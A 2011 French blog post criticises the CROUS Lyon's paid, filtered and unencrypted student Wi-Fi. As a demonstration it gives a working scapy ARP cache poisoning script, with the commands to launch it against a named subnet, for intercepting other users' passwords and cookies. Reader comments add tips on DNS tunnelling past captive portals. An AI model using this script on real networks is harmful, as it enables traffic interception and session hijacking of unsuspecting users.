// bosse.
Le CROUS de Lyon, FAI ou pas ?
Quel est le statut du CROUS de Lyon quand celui-ci vend, pour 6 euros par mois, un code d’accès à son réseau Wi-Fi, donnant ainsi l’accès au réseau Internet ? Fournisseur d’Accès Internet ? J’imagine que non.
Parce que Internet filtré, ce n’est plus Internet. Impossible d’aller, par exemple, sur MegaUpload. Obligé de contourner cela par un proxy.
Ensuite, parce qu’un fournisseur d’accès à Internet doit, j’imagine, préciser le débit, fut-il théorique, qu’il vous vend. Là, rien n’est dit. On peut avoir de bonnes surprises, comme de très mauvaises…
Également, le code d’accès est limité à un appareil. Comment faire quand on a deux ordis ? Ou un smartphone et un ordi ? Ou les trois ? Obligé de chercher des identifiants FreeWifi ? De cracker la clé WEP du voisin ? D’utiliser son téléphone en tant que hotspot ?
Enfin, pour 6 €, vous avez droit à tout ça dans un réseau non protégé. Cela veut dire que, si vous vous êtes honnêtement acquittés de cette somme pour accéder à Facebook, vous n’êtes pas à l’abri de vous faire voler votre session par qui que ce soit.
Exemple : test.py
#! /usr/bin/python
from scapy.all import *
import sys
import time
rang = sys.argv[1]
iprouteur = sys.argv[2]
a = arping(rang, timeout=7)
d = {}
for i in range(len(a[0])) :
d[a[0][i][1][ARP].psrc] = a[0][i][1][ARP].hwsrc
if d.has_key(iprouteur):
d.pop(iprouteur)
while (True):
for a in d:
paquet_arp = Ether(dst=d[a]) / ARP(psrc=iprouteur, hwdst=d[a], pdst=a)
sendp(paquet_arp)
time.sleep(4)
$ sudo su # echo 1 > /proc/sys/net/ipv4/ip_forward # ./test.py 10.30.100-101.1-255 10.30.100.3
Ceci est une attaque de arp cache poisonning réalisable même par quelqu’un ne possédant pas de code d’accès, le faisant passer pour le routeur auprès de tous les usagers du réseau. Ainsi, tout le traffic émis par les utilisateurs passe par lui, il peut le consulter avec Wireshark par exemple, et en extraire ce que bon lui semble (mots de passes en clair, cookies pour voler votre session Facebook, Twitter, etc…).
Pas top.
Je pense qu’un code d’accès devrait être donné gratuitement à chaque étudiant, et qu’il devrait offrir un véritable accès à Internet. Quitte à ce qu’une limite de bande passante soit mise en place pour mieux répartir. Et pour sécuriser leur système : un code sous forme de clé WPA2 ?
| Imprimer l'article | Cette entrée a été posté par Fred le 12 décembre 2011 à 12 h 56 min, et placée dans Internet, Réflexions de comptoir. Vous pouvez suivre les réponses à cette entrée via RSS 2.0. Vous pouvez laisser une réponse, ou bien un trackback depuis votre site. |
about 1 year ago
Je suis d’accord avec toi de A à Z, seulement pour le WPA, ça oblige à avoir un seul et unique mot de passe pour tout le monde. Ou alors c’est du WPA entreprise et il faut un serveur radius derrière, ce qui est tout de suite plus lourd. Voilà pourquoi les 3/4 du temps ont à juste droit à un portail captif avec un wifi ouvert et juste un proxy filtrant derrière… au détriment de la sécurité et de la confidentialité !
about 1 year ago
Ah j’ignorais ce détail, effectivement c’est problématique…
.
Autre chose que je viens de découvrir : les requêtes DNS passent outre la plupart de ce genre de portails, et il existe un soft appelé iodine (pour IP over DNS), à installer sur son serveur en dehors, permettant d’accéder à Internet grâce à cette astuce